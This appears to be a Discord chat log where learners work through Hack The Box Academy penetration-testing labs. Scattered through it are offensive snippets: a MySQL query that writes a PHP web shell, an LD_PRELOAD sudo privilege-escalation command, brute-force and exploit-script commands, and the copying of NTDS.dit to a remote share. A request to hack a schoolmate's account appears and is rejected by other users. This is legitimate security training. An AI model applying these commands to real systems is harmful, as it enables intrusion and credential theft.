#modules
Has anyone done Linux Priv Esc? I have a question about the skills assessment, flag4.
Hello
Hi
Can someone help me with the Broken Access Control skills assessment? After trying for hours I'm totally lost.
I need advice regarding the Pivoting skills assessment. Reached mlefay, found 172.16.6.35 with the PowerShell ping sweep but how can I find the creds to log in there? Opened a lot of hidden files but nothing
how far have you got?
I found 1 user and I think I figured out the password pattern
Anyone available for a hint for AD Enumeration & Attacks - Skills Assessment Part II question 5 - what is the user's password? I've enumerated the domain, finding all the users, but honestly I'm lost on how to get the user's credential from here on.. thank you
dm me
Does anyone know who I can contact if I have a technical problem about a module ?
what type of problem?
most minor issues go to #858470491676737536
In the Windows Fundamentals module, when I use xfreerdp it keeps disconnecting me from the remote Windows machine with an error message
Has someone here done the "User interaction" part in the "Windows priv esc" module?
What's the error? Screenshot if you can
I have, what's the issue? Also which section are you on?
Can I PM you?
sure
Almost done with the Broken Access skills assessment.. I need a little bit of help
decoding the cookie
@lethal atlas +rep
thanks!!
This one
Did you execute it with sudo?
No, is that the problem? I executed it without sudo during the past sections and it didn't disconnect like this
I found an alternative by using rdesktop
Could somebody help me with Attacking Common Services SMB "what's the password for jason"? I thought you just use crackmap and the provided password list to get the pw but there's no hit?
```sh
crackmapexec smb 10.129.194.196 -u jason -p ~/Desktop/pws.list
```
I use metasploit for that but crackmapexec would work just fine, the cred for that user is in the given wordlist
oh nvm, moved back a section to FTP and found it, weird that you don't have to use SMB in the SMB section tho
oh yea that is weird
nvm, I just tried crackmapexec and it flags the right cred as wrong on the pwnbox
Worth trying the local auth or whatever it's called for CME
I've had a few fail cause CME tries the domain auth against a box that's not in a domain at all and so it just doesn't work but there's no error, you just either get all hits fail or, more bizarrely, all hits pass
I think I got a similar issue on an Active Directory lab a while back
@zealous belfry I just tried with metasploit and it seems to be working fine for me, use auxiliary/scanner/smb/smb_login
huh that's weird
Let me try crackmapexec again on my machine, hope this is not a pwnbox issue again
nah I don't use the pwnbox
oh
prob a CME issue
oh yeah I forgot you didn't use CME
should try that
Nah, if I'm honest that module is weird af. It's SMB and you retrieve the flag by brute-forcing FTP.. I don't get it
Most of the sections in this module use the same target machine, so if the jason user can log in to SMB he can mostly log in via FTP too, and the flag is in a place you can access with multiple methods
oh wait
--local-auth actually did the trick
@thorn urchin oh wow nice tip, I'll note it down, thanks
Me too, appreciate it, ty
np
I probably stumbled across it while working on that very module
Interesting
ty
SandPlanet has been banned permanently.
For the life of me I can't remember how to SSH to a target now that I have their private key
no worries
Over a month late but thanks for the respect on HTB (I just learned how to check that)
wait that's a thing lol
Yep, just gotta visit their profile
How do you open an encrypted docx file if you have the password?
I'm not sure about docx but I can open password-protected PDFs in Chrome
Thanks! that worked!
Rip, this site spits out the pages as JPG so now I have to hand-write the flag
Hello all, I am having issues with the last challenge of the HTTP Headers section in HTTP Fundamentals. The question says to find the flag in the requests when browsing to the target in the network section of the devtools. I'm looking at the flag, Flag_….txt, but no matter what format it says it's wrong. I've tried restarting from scratch, I've tried htb{} flag{} flag_ just the numbers.txt, the entire GET request lol. Is this question broken?
HI
BEEP BEEP! BMW M4
Trying to dump the contents of an IMAP Mailbox over SSL, can someone point me in the right direction for the FETCH Cmd
@fresh reef what is the problem
Upon login, after choosing my inbox, I've come up against the current struggle pulling the message itself
1 FETCH 1:* FLAGS pulls the flags and the ALL pulls a response I truly don't understand yet
As well as I still can't find documentation on why the preceding "1" exists, thus further clouding my debugging judgment
I'm having an IMAP command syntax struggle
@fresh reef maybe use Evolution
@fresh reef I am not understanding you
@placid quest sent a terminal pic, and thx btw
Hello
Are people able to connect to Session Security: Skills Assessment? I can't connect to minilab.htb.net even after the vHost has been configured
Hi, I'm currently in the Password Attacks: Pass the Ticket part of Academy and I've encountered a problem. I've used keytabextract.py to get a hash from a keytab file. It's only provided me with an AES-256 hash but I can't seem to crack it with hashcat or the online tool suggested by the module. Any suggestions?
this is the hash ||0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d||
nevermind figured it out
no
Can someone nudge me forward in Session Security: Skills Assessment? How am I supposed to figure out who the admin is, and what am I supposed to do with this:
Well I haven't done it but as the error tells you, you are maybe missing the [?url=] parameter. Maybe it's an SSTI or SQLi, IDOR, something like this would be my first guess
This is the hint in the assignment, I just don't understand where can I get the '?url' part:
Hi,
Is my understanding of LD_PRELOAD correct?
If LD_PRELOAD is available and a user can run a SUID file, we can escalate privileges via loading a .so script, that is, a C program compiled via gcc.
Then overwrite the env with the shell alongside the SUID file to spawn a shell that will run as root.
sudo LD_PRELOAD=/tmp/shell.so sky_backup_utility
Thanks!
Hi guys, I need some help with attacking common applications skills assessment 2
What is the admin password to access this application? - I tried the default credentials and also a brute-force attack for the default admin user ||n...admin||, on the application from the question above, but I haven't got any valid password
Edit: solved!
Hi, can someone help me with the Pass the Hash (PtH) section of the Password Attacks module??
I can't figure out how to connect to DC01
Any channel to discuss retired machines or machines in general?
.so is Bash scripting?
you mean the last question?
?????????????????????????
Yes
write ++verify in #bot-commands
hello
Until a moderator answers, I can't verify my account
identification error for some reason
what have you managed to do so far for that question?
So you must wait then
I tried to use the reverse shell but I don't know how to reach the DC01 machine
hi
hello
Please see your DMs for instructions on how to verify your HTB account.
you mean you have a reverse shell?
or you can't get one?
dm me
I managed to create it with the site suggested by the module but I don't know where to upload it
@rustic sage send us the command you are using to connect
Wait a sec and I'll send you
you have to use it in the Invoke-WMIExec command
Yes i used that
and it didn't connect back?
ofc
Can you describe where you're stuck at?
Question: can I change the letters to white, cuz grey on blue is not readable
nvm, for some reason Firefox is redirecting my requests to HTTPS, just tried a browser other than Firefox and virtual hosting isn't applying. Weird because I set the option 'HTTPS-only mode' disabled
idk if it's the version I'm using or because I'm launching Firefox with Firejail
up
What do you mean?
As I remember, it stands for .soname. It is similar to a Windows DLL; it is commonly used for preloading a program. The .soname also includes the C runtime library.
Is there anyone to help with the PIVOTING AND TUNNELING SKILLS MODULE? How to transfer mimikatz to the mlefay host? I'M IN WITH xfreerdp /v:127.0.0.1:3300 /u:mlefay and can't find vfrank's password, I'M BADLY STUCK
Anyone else experiencing lag spawning targets?
yep
yes
Are targets down for everyone ?
These hosts are up apparently. But when you scan them individually nmap doesn't find any open ports
Ignore previous message. Those hosts are up and ports are open on them
mine spawned now
LD_PRELOAD allows you to specify the order stuff gets loaded, such that you can load something before other stuff. If a SUID file exists and runs under elevated contexts, yes, you can escalate with it. However, it's possible the program with LD_PRELOAD doesn't require a SUID file. I don't think one requires the other.
What do you mean?
same
the delay of any transfer of data with the Academy module targets.
For the AD skills assessment 2, question "Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host" - can someone give me a hand getting the flag? I've connected with the user/pass that I found in the config file. Thank you
Seeing everything operational though
yes
it's taking very long
Hi, I'm trying to spawn a machine but it keeps loading. Never happened before. Anyone know why it keeps loading?
Welcome to the club
Looks like I'm not alone xD
Looks like HTB is having some issues today. Be patient, I am sure they are working hard to fix the problem.
Hi, I have an issue on Academy. I click on spawn target (Stack Overflow Linux x86 module), it says the target is spawning but it doesn't spawn. I also tried to spawn targets in other modules but that didn't work either. Can anyone help me?
never spawns
Read everything above your comment.
Typically the day I decide to sit down and get some modules done...ah well
Me: of course...
same lol
Depends if staff are aware of the problems
Make sure to use the support bubble to report this as well.
Anyone?
would appreciate either
What's the default password for that service?
||PASSW0RD|| (with a zero), but it doesn't work
Cheers
F
Pwnbox is up for me now
For me the target of the Shells & Payloads assessment is taking an eternity to spawn, I waited a whole hour for it to spawn and then refreshed the page to try again. When I tried again I was getting that same error. Now it's been loading again for about a good 20 minutes...
I am also having issues spawning servers..........
If it helps to know, I'm seeing this as well. I cannot paste a picture in my post yet but it is stuck at "Target is spawning..." with spinning circle. Was working great a little over 7 hours ago when last using it. And generally, it works really really well, never have seen this before.
this.
FYI, I see this in the support chat window so they are very much aware of it: "We are currently investigating an issue with spawning machines on Academy. If you are affected, please do not open a ticket. We are working on resolving this as soon as possible."
Could try and refresh and spawn again, did take mine a while though.. servers must be busy. Maybe depends on VPN region/server as well.
Thanks... I usually do that, if not seeing a VM right away, refresh page and spawn... but after many times, no dice. Are you seeing it work for you?
Yeah, mine just started working 20 mins ago
Just in time for me to take a break
LoL
I was thumbing up your mention of it working for you... but the emoji is so big I hope people do not think I'm saying it is working.
thanks for the HU.
np!
Can someone explain the question in Broken Authentication > Session Attacks > Brute Forcing Cookies? I was able to convert one token to reveal the user and role. I can change them but idk what I'm supposed to change them to. The question asks for a super user which I tried as a role but no luck.
Just to check. Is anybody having issues spawning the target???
Is the issue still persisting???
Yup, still occurring for me.

I still have this issue yep
same
Hope support can get it fixed soon. We appreciate all that you do. 
Right, so there is an issue with spawning machines.. I thought something's wrong on my end
Hey folks, guess what? I just came back to my system and had pwnbox and target IPs, things were up, so I figured things were back. Since I had been away, I had lost "time" on the systems, so immediately reset both to have a fresh long time period. After that, I see target spawning/spinning circles...
So maybe it works but is very very slow... so maybe just refresh, spawn, and wait and do not refresh... just wait, and you will eventually get a target. This would be consistent with what others have reported, that they eventually get one but it took a *long* while.
This is all a *guess* on my part, but I did have a target and when I reset just now it went back to spinning/spawning and no target. I should not have reset for a fresh long duration time period, just used whatever I had with whatever time was left.
Like right now mine is still "spawning" after 5 minutes ... but I am not refreshing at all, just not touching it, leaving it... I will report back if it eventually has IP.
I got a target after waiting for a few minutes, but the instance of gitlab isn't responding (502 code)
Okay, so maybe even though I saw IP, maybe the target was not fully functional. Thanks for the heads-up on that.
Does GitLab have something to do with the box you were on, or is it to do with how the VMs work?
It's for the exercises on one of the modules, not part of all VMs
Seems to be fixed now. Everything works fine after ~15 minutes of uptime on the target
I still have spawning... about 7 to 10mins now.
oh just got IP after sending that last message.
I still have the issue :/
Pwnbox is working, just target is not
I'm having issues logging in to HTB Academy. Not receiving reset password email.
Issue resolved.
I had luck by refreshing, starting pwnbox, starting target, then waiting without refreshing for about 10 minutes and it eventually gave me a target.
I am using a target now and it has about 50 minutes left. It is the most productive I've been this morning... to refresh/spawn and wait. When I would keep refreshing, I never would get any target... so waiting after spawn, even for 10 minutes seems better than constantly spawning.
(that is what I observed, maybe you are seeing a different issue but sounds the same)
I was able to find this out by spawning and taking a coffee break... I came back and had an IP address. When I reset to spawn again, it was waiting for about 10 minutes before getting another IP. So I do not recommend resetting to get fresh "time" on the target, just wait for a target and use it as best you can until you need another.
Hello, for AD assessment 2, question "Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host" - I am on the SQL01 machine as administrator, ran mimikatz but did not get anything that might get me to the MS01 machine, could anyone give me some help with this? Thank you
Hi guys! Having some trouble with the Web Server Pivoting with Rpivot section.
Everything is working properly yet when I try to use proxychains to request the webserver it just keeps loading.
Running nmap against 172.16.5.135 via Proxychains work btw
Edit: Network was very slow, the request worked without doing anything, just had to wait
I'm on the Medium lab for Password Attacks || I know about the "d" user but not sure how to crack his password, I tried the default passwords for Tomcat but I'm not sure where to go from here ||
Hello all, how long should an SMTP enum scan take? Using quite a big txt file but it seems to be taking a long time??
Hey I'm having problems solving the "Attacking Common Services easy lab". I found ||fiona||'s creds, the files in ||FTP|| and I was able to upload a ||PHP webshell via MySQL (SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php';)|| but when I go to the web page where I saved it, it returns "not found". Any hint please?
@hardy anchor did you log in to SMTP
have you enumerated SMB already?
Can't, it takes anonymous passwords so crackmap just returns everything as a valid password
I got really excited for all of 2 mins when it returned the password as 12345657
only to find out it's a dead end
ya, it allows anonymous access, need to enumerate what you have access to
||You mean the doc? yeah that's how I got into J's account and that's where I'm stuck lol ||
oh ok
I found || the d account listed in the passwd file so I've been trying to figure out how to get to him to see if I can find more but I'm now stuck ||
SSH as J and try to access and enumerate the MySQL service
You mean the SQL DB files?
Always good to look at running services, you'll see the machine is running a MySQL database, you'll need to access the database and see what other information and creds you find on there
how do I see running services?
There's actually quite a few ways you can do so but I usually use the top command in Linux, it shows the processes taking up the most memory and processing power
The terminal program you need to use has the same name as the service, mysql
you could use other programs though too
people tend to reuse passwords
it seems so simple now
idk how I missed it
Well, I do, I was thinking I needed to find the DB file. I didn't even think to launch mysql
Hey, I need help in PASSWORD ATTACKS - Attacking SAM, I'm trying to dump the SAM files with secretsdump but I have an error "'NoneType' object is not subscriptable", idk what I'm doing wrong
I can't
@hardy anchor enumerate the SMTP
Been there a bunch of times, missing the seemingly obvious
keep calm and enumerate
Yes I did it
Anyone online that has done Linux priv esc?
I was able to log in but I can't do anything interesting
I have
The Skills Assessment of that module has 3 unintended vulns and since I reported that issue I haven't double-checked so it may be fixed, also a staff member said that the entire module will be updated soon
Sure, shoot me a DM if you still need help
Gonna take a wild random guess that pwnkit was one of em
yep
My friend was doing the Getting Started module and was sidetracked trying to figure that out because LinPEAS pointed it out
I was like lol no, I guarantee you that's an unintended path, look elsewhere
Haven't done the module yet but tbh pwnkit is something important enough that it should probably be a part of that module somewhere
yep, but it's just that the module is kinda old so an update would be good for newer exploits like this
yeah
It's definitely the hard part about modules, you could get unlucky and in as short as a month have the whole thing be outdated
So for that section I didn't extract the SAM file and use secretsdump on that, I used ||metasploit|| and ||crackmapexec||, I think both methods are shown in that section so use that
That module came out 2 years ago
yeah not shocked
Thx
Anyone who's completed the pentesting path? How long did it take you?
Not many people have completed it yet so you may not get your answer, but for the record I'm 50% of the way through and have been at it for roughly a month
but your background is going to have a big influence on how quickly you get through
Having IT experience will be super helpful
it's been taking me a while since I have no college or career experience
However it is accessible for n00bies
I got 2 and a half modules left but god knows how long I've been doing that path (most of that time is procrastinating)
like I have a weird background in that I used to be super active like 10 years ago and then took a big break for a buncha years basically only tuning in to news n stuff but not really practicing or learning new stuff, so like the first 40% of the course was basically just a refresher for me.
The AD module is a mammoth of one and has been taking me the longest. Lots of content that's actually new to me plus a ton of sections, and wrist problems cropping up means taking notes has been difficult, so I've slowed down a lot, probably been spending the past week and a half on that module alone
Web stuff always used to be my weak area so I'm very curious and excited to see how those sections go for me
since at least if the HackTheBoo CTF was anything to go off of, my intuition for that area has drastically changed since my old days.
CBBH is great for web stuff
super in depth
I have completed all the modules, will complete the exam sometime
Yeah, I may check it out after I finish the CPTS, my post plans for it aren't set in stone yet unless I miraculously save up enough for the OSCP, in which case that's definitely going to be my next aim after this.
It's just so expensive that the few times I've had the money to purchase it I've been too scared to bite the bullet even though rationally I know I have the capability to do just fine. So part of me is banking on clearing the much more accessible CPTS to assuage the non-rational emotional part of my brain into agreeing with the money risk.
Since by all accounts the CPTS is newer and harder than the OSCP in most areas and the ones that it doesn't cover used to be my strong points anyways lol
I think OSCP will be a breeze if you do CPTS
That's what I'm banking on
Wait, CPTS is harder than OSCP?
That's the general consensus so far, yeah
It's more modern and focuses more on TTPs
I mean OSCP bans the usage of some tools because they're too powerful and would make their exam lab too easy, CPTS says use whatever you've got. Draw your own conclusions
what is TTPs?
tactics, techniques, and procedures
I don't know what that translates to in practical terms, it's just what I've read from people discussing them and staff, but my interpretation is that the OSCP is more likely to be a series of challenge boxes, whereas the CPTS is more likely to be a simulation of a real network and you must traverse it accordingly.
But I could be wrong.
Hopefully within a couple of months I could answer more clearly
Getting this error while executing chisel on Pivoting Tunneling and Port Forwarding module, in the SOCKS5 Tunneling with Chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
Any idea how to fix?
anyone available for some help on this?
Could I have some help on attacking common applications: Gitlab?
I can't get the user enumeration bash script to work
Looks like it's breaking on something and causing syntax reading errors
try running it with sh specifically or bash specifically instead
so I changed my default shell to /bin/bash cuz I know pwnbox uses zsh
Hello, can you help me? I am in the COMMAND INJECTIONS module, specifically in Bypassing Blacklisted Commands, and I don't know how to get and read flag.txt
Don't need to change the default shell, you can just call the shell directly on the script
Still not working 
you tried both bash and sh?
Well, that's a different error now
hey different errors are progress
Not sure what that one means though, I'd have to look at the script
Yeah, I'm using that script
Just renamed it
I get frustrated when I do exactly what the module tells me to do and it doesn't work
oh yea, you are using that script, not the given script, that's weird
let me give it a check
pls
Good to know! My plan was to go this route, then move towards OSCP as my next target.
Passwords are still the primary method of authentication in corporate networks. If strong password policies are not in place, users will often opt for weak, easy-to-remember passwords that can often be cracked offline and used to further our access. We will encounter passwords in many forms during our assessments. We must understand the various ...
What a beast!
took me two weeks!
So... it's working fine for me, try re-copying the script
```sh
searchsploit -m ruby/webapps/49821.sh
./49821.sh
```
good job though!
Got it to work. The script on exploitdb wasn't working for me for some reason
but that should be the same one on searchsploit?
yep it should be
oh wait, so I think I misremembered, there is no given script, I tried with the one on exploitdb and that doesn't work but the one from searchsploit works for me
Yeah, the module gives you a script from exploitdb so I just used that one
oh
weird that they would be different
Want to know something weirder? Both scripts are the same, both have 110 words and a text compare shows both scripts are the same, but the one on exploitdb doesn't work
probably encoding shenanigans then
Hexdump with xxd and compare those
@vital adder yup, the one on pwnbox is just ASCII, the downloaded one from exploitdb is ASCII with CRLF line terminators
oh yea, why didn't I use file on both files
yea, the code is the same, so if you just copy the raw code from exploitdb it should just work fine
that sounds like extra steps that tr can do for you
Hi, can someone help me with the last question (find another user with DCSync rights) of the Enumerate Domain ACL section of the AD PowerView module?
hi can someone give me a hint for this part of the Windows fundamentals module?
I'm trying to identify the service that has to do with PDF editing
I don't want someone to just give me the answer but if I could have a hint
I figured out multiple ways of looking at different services on the windows machine
but I don't see one that has to do with PDFs specifically
I've not done this module so idk for it specifically, but in the real world how I'd tell is browsing any websites they've got and looking for any PDF files they might be hosting, then checking the metadata for that.
I dunno if that's what they're going for in the module though
I don't think so
there's no PDFs open
and I don't think there are any on the system
that are saved anyways
so it's a tough one
solved it
never mind
Can anyone help me with an SMTP issue please?
I'm struggling to change the query time! Not quite sure what or where I need to put in my command to change it...
50% in two months or something
Am a rookie, a bit of everything
For the record, the reason it doesn't work is because the shebang line (#!/bin/bash) isn't usually put as the very first line in most scripts from exploitdb. For errors like this make sure to always check the shebang line, and move/add it
Sure, dm me or write here what you've tried so far
no
Read the #rules, we don't allow illegal activities. EDIT FOR FUTURE STAFF: There was a serious rule-break ping, it's not a ghost ping
Can anyone help me with this
Can any one help me with hashcat concept
@woven copper any hint on this one? Found this, if someone has some issue regarding this, DM me.
Attacking Enterprise Networks - Lateral Movement says we can do this via proxychains using GetUserSPNs.py or PowerView but every single combo I try with GetUserSPNs.py returns the same error: [-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C090690, comment: AcceptSecurityContext error, data 52e, v4563. Tried it with 4 users, including the Administrator. The PowerView method works fine, any ideas??
Doing the Password Mutations section in the Password Attacks module. Is it normal that the exercise takes so long to brute-force the correct password?
For the Web Service & API Attacks module, did anyone do it the SQL Injection way? I've done it using a different method and was wondering about the sql injection way
For those who come to face the error "version `GLIBC_2.32' not found" (or similar) on the SOCKS5 Tunneling with Chisel section.
You can do export CGO_ENABLED=0 to disable CGo and get rid of the dependencies, and then use go build and the binary will work.
nice
Hi, how can I register for HTB CTF 2022
Do you mean HackTheBoo? Because it's already over
I am not aware of any HTB CTF running right now.
Hey good morning! I'm having problems solving the "Attacking Common Services easy lab". I found ||fiona||'s creds, the files in ||FTP|| and I was able to upload a ||webshell via MySQL (SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php';)|| but when I go to the web page where I saved it, it returns "not found". Any hint please?
from your mutation list, delete the first 17000 passwords. I had the same issue and was told this here.
hi
Also on this module, when you escalate privs on Win01 the guide says to run mimikatz after adding your user (ilfserveradm) to the administrators group. I did that but mimikatz doesn't have enough privileges. Tried to launch a new cmd.exe as admin but it rejects the creds. edit: I can't read the flag on the Administrator desktop either, is some step missing from the section? The same issue was mentioned on the forum but no response - https://forum.hackthebox.com/t/attacking-enterprise-networks-lateral-movement/266130 - double edit: I just modified the privesc to get a reverse shell instead
I did it already, but still don't have it.......
dm me
Looking for help with the Attacking Common Services - hard lab. I managed to get an RDP session with F**** who doesn't really have many privs. ||The problem is I cannot do impersonation with msf cause it tells me none of the users that can be impersonated are sysadmins.|| I found out about the ||linked server|| but I'm unable to access it yet.
I've not done that one yet, but based on the error make sure you're escaping any special characters in the password
Or specify DC if available
I did specify the DC and the passwords are inside single quotes so no escaping needed.. also same error with the Administrator hash
Another thing to check is whether the proxychains dns is interfering. Are you using IP address or host names?
By default, host names through proxychains go to 4.4.2.2
Using IP, have not had any issues using proxychains with impacket etc. until now. I can use the same creds/hashes and IPs with other scripts, e.g. psexec.py, crackmapexec, evil-winrm
My notes for this aren't great but ||you should be able to impersonate, I did it manually via RDP I think (not MSF)||
Hi Farax. I need a little help with the easy lab. Could you please give me a hint?
This is my message
Is there no one who can help me with smtp-user-enum??!!
Try writing that same command 2 times and you will get an error that the file already exists, but you will then see why you cannot access the web shell, there is something in the command that needs to be added so it goes in the directory specified. If you still don't know what's the catch, PM me
Did you RDP with user f****? Because I cannot log in anywhere with user j***...
And in MSSQL I can only log in with user f**** by Windows auth
yep with f***, might have used CME to enable RDP (but doubt it as it's not in my notes)
Hi,
I'm stuck on the Attacking Active Directory module, ACL section
Can someone help me please?
Thank you Farax. I will try that
I think there are some issues with the Password Attacks module... it is a waste of time as things don't work as taught
@merry salmon Thank you!! I just spotted it
Can I have help in the Attacking Active Directory & NTDS.dit section of the Password Attacks module?
Hi, I am new, and was wondering if I could start learning a bit of ethical hacking somewhere?
Warning: xx.xx.xxx.xx giving up on port because retransmission cap hit (10).
does anyone know why this problem happens?
and how to solve it
what module?
Scan slower
start with the getting started module on academy
oh ok, thank you kind sir/lady
Can anyone help a bit with one of the last tasks in the Intro to Assembly module?
Anyone completed ACTIVE DIRECTORY ENUMERATION & ATTACKS? I am having an issue with question 2.
question 2 of what section
active directory enumeration and attacks
Question 2
I found the user and cracked the hash but it seems to be incorrect.
That's the name of the module, there's multiple sections within that module, which section are you on?
Sorry. Miscellaneous Misconfigurations
footprinting
ACTIVE DIRECTORY ENUMERATION & ATTACKS :Miscellaneous Misconfigurations question # 2
scary dude yo
Also that one didn't need a ping, just a lost soul
but thank you
felt like clear spam so ping seemed warranted, but ill keeo it in mind
for a random troll like that you can just dm a mod or two for clean up
or ping if you see one of us active
sounds good
anyone help me to change query timeout on SMTP-user-enum? i dont know where I need to place it in the command line
there's -t, idk if that's what you're looking for though
I've tried -t 15 and --timeout-enum 15, which I'm sure are both right, but I've tried moving them all around the query and it doesn't change anything? so not sure...
what problem are you even trying to solve? might be trying to apply the wrong solution
my only other option is metasploit but I should be able to get what I'm looking for via smtp-user-enum so a bit frustrated I can't figure it out
footprinting module in the academy
VRFY
hah I just finished footprinting today
nice! its been fun so far
hint hint hint
yes sir
are you sure thats the mode that works with this target
I believe an nmap default script will tell you what the smtp server accepts
the module covers several different methods, if one doesnt work, try another
ok I'll be back... thank you
just because the server accepts it doesn't mean it's a viable path
ye, I'm just saying the nmap default scripts helps you figure out what you need to put for smtp-user-enum
@slow hawk fact
hi i'm new
so I've changed the mode.. but I still don't know where or how to change the query timeout?
i dont know where in the command i need to type it?
why do you need to change it?
Remember that some SMTP servers have higher response times.
@rustic sage what tool is that
I had to use -t for that
im still drawing blanks... let me revist my query 1 sec
pwnbox or VM?
VM
how can I learn kali
if the second mode you tried didn't work, try a third one
no such thing, it's just a linux distro prebuilt with a bunch of tools
try the Linux fundamentals module first, then the getting started module
pwnbox
that'd make sense then because you'd have greater latency to the target
pwnbox def doesn't need -t for this one
@fair belfry try some books maybe
understandable
mad can i pm with my query?
are you using the right wordlist @rustic sage ?
yeah
sure
I dont mind either
@slow hawk cheers for the help :). @thorn urchin thanks for the help
all solved now.
yay
nice, was it the mode
proxychain configuration I have finished but still doesn't work @slow hawk
was wait time i needed to use -w
I've never used proxychains lol
weird, don't even see that as an option
me neither until it was pointed out lmfao. anyways its all good just running scan now so
my result just came through cheers peoples
Is anyone willing to help me or teach me how to hack a ig acc. He is someone from my school idk who he is tho he is posting gossip or secrets from everybody and posting it public and making beauty school competitions please someone help me please dm thanks. I am sorry if this is the wrong channel in advance.
literally a crime and against the rules
Hi everyone! I'm doing the attacking common services - medium lab and I have a question: I'm trying to brute force ftp (because ||fiona|| creds from last server didn't work) and I would like to know if it's the correct way to solve the lab because this probably could take a long time
no
try enumerating deeper
Yes, i found this:
||PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
53/tcp open domain syn-ack
110/tcp open pop3 syn-ack
995/tcp open pop3s syn-ack
2121/tcp open ccproxy-ftp syn-ack
30021/tcp open unknown syn-ack||
||fiona|| creds didn't work either for pop3 and ssh so I started with ftp. But probably the correct way is dns?
nope, you should look a bit more closely at what services are running and check for common misconfigurations first
It's also worth keeping in mind that much of hacking is finding the overlooked spots. Just because they've locked down one service correctly doesn't mean they've locked down that exact same service elsewhere correctly
Hm. Thank you @thorn urchin I will look more closely
my notes on this lab have me being shocked at how quickly the lab is over, that med lab is 80% just thorough enumeration
That hint made me realize what I forgot. Thanks
Lab completed
nice
Anyone completed ACTIVE DIRECTORY ENUMERATION & ATTACKS ? Miscellaneous Misconfigurations I am having an issue with question 2.
hey guys, is there someone who wants to have a look on a simple sqlmap command?
I probably have the dumbest question ever to be asked here, but I am stuck at Password Attacks module, section Attacking SAM, first question: Where is the SAM database located in the Windows registry? (Format: **). I'm stuck for like an hour, someone please put me out of my misery...
It's uhh right in the module for you
Nice
Usually when the format thingy had four "*" it meant that the answer is four characters long...
I am stuck in the sql-injection module. I found some json-data to test with sqlmap, but however I draft the command (using -r flag or --data flag), the output after a long long runtime tells me the POST parameter JSON does not seem to be injectable. Am I missing something really obvious here...?
I haven't done that module yet, but sounds like the json parameters aren't injectable with sqlmap. Have you manually verified that it is indeed the route?
yes, I did.
I guess in this case I do have to work with json, because the previous description of the module also dealt with json-injections
I got it
hi everybody, I'm stuck in File Upload Attack module on Limited File Uploads, on question 1 : "The above exercise contains an upload functionality that should be secure against arbitrary file uploads. Try to exploit it using one of the attacks shown in this section to read "/flag.txt"" .... I've tried all payloads but the app doesn't display anything .... any help??
Hello, I am doing the windows fundamental module. Could someone guide me on how to get the machine's build number and Os after having access
In the module they talk about this command:
wmic os list brief
ls
Okay let me elaborate; I am using xfreerdp tool and immediately I manage to have access to the windows target I am stuck on what to do next, could someone guide me please? My aim is to get the Os info
Hey guys
Is it normal I'm locked from sending messages on most other threads?
I was wondering how I gain points with hackthebox. I did the first beginner module called meow.
modules refer to academy modules, not individual boxes
I'm working on that section now, I'll let you know once I get through it
can someone help me
hi everyone! I was curious if anyone knew if MSSQL saved windows users passwords. I kinda went under the hood of SQLMap, and in queries.xml, tried to see how it requests usernames/password hashes for sqlserver. None of the queries returned the name I logged in with! the only username that showed up that I recognized was sa
Hi, idk that so thx for info
Hi everyone.
I am a newb and can't figure out a couple of things. Anyone feel like helping?
nevermind just found a great article. apparently windows authentication doesn't store the password in SQL server
I have a question with Windows and OpenVPN. When I use any Windows machine (VM) with openVPN and download the academy-regular.ovpn file and use it to connect to the training environment, the VPN constantly disconnects and reconnects making for a very painful experience. I have tried with a VM on ProxMox as well as a local KVM on my Linux machine. Using Linux or any Linux VM I can connect without issues. Does anyone else experience this or have an idea on how to solve the issue? I appreciate any help!
What do you need help with?
In Linux Fundamentals Page 5 / System Information. I can't seem to figure out What is the path to the htb-student's mail and Which shell is specified for the htb-student user.
Almost certain it's bash but it says no. After digging through all of the directories I don't see any about mail. IDK
Feeling real dumb. LOL
enumerate the /var directory for the mail. For the student shell you got it, just find the directory its in and list that first /directory/bash for example. Don't feel dumb about learning things!
Thank you very much CrazyHorse! I'm out of workstation time for today but that gives me a direction to go in tomorrow when I get back on. I appreciate your help very much!
No problem!
Iβm working on the skills assessment for SQL Injections Fundamentals and I am trying to write a file to the web root βvar/www/htmlβ through a union injection but I keep getting βErrcode: 13 Permissions deniedβ. I am the root used so I donβt why this is happening any hints or tips would be greatly appreciated!
Maybe you don't have write permissions to that directory explicitly. Try the ||/dashboard|| directory.
How are you doing the SQL injection? you should be able to write to that directory without a problem.
there are two users asreproastable and both with easy to crack passwords, you're probably trying to submit the wrong one.
With a union injection similar to the example one in a previous lesson
are you on the skills assessment then? I was thinking you were on the writing files section...
the hint Pedant gave you is where you should go. keep an eye on the URL of the web page...
Can someone please help me with ACTIVE DIRECTORY ENUMERATION & ATTACKS > ACL Enumeration's last question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word). I found two using bloodhound but neither of them are being accepted as answer.
Hi, I'm doing the passwords attack easy lab, I've tried bruteforcing ssh with hydra but it doesn't get me anywhere. Nmap shows there are very few services I can try to attack on the machine so I'm kind of puzzled. Am I correct in trying a bruteforce attack? Or am I missing something?
hey! me too. it detects it as an infected dll.
could you try again by adding the dll folder as exception in windows defender?
although disabling defender worked just fine for me
Settings > Windows Security Settings> Virus & threat protection > Manage settings > Deactivate Real-time protection
@slim plover I eventually found it. Took me a while and I had to go through it a few times but finally got it with powershell and following the lesson.
Tried running the powershell commands as per the lesson but couldn't see any output from it even after waiting couple minutes. Does it take really long for the rights to show up?
It takes a few minutes. Send me a DM
Hello,
@thorn urchin Thanks. I found the other user.
Wondering if someone can help. I can't seem to copy NTDS.dit to my local linux system... keeps erroring with
```powershell
C:> cmd.exe /c move C:\Users\jmarston\Desktop\NTDS.dit \10.10.14.xxx\CompData
cmd.exe : The specified server cannot perform the requested operation.
+ CategoryInfo : NotSpecified: (The specified s...sted operation.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
```
(one of the backslashes has been omitted in my message on here. so it aint that)
@loud sapphire use cme
that's not the process though. I am supposed to use evilwinrm. It's worked before, but just not now.
@loud sapphire if u are using evil-winrm use download option
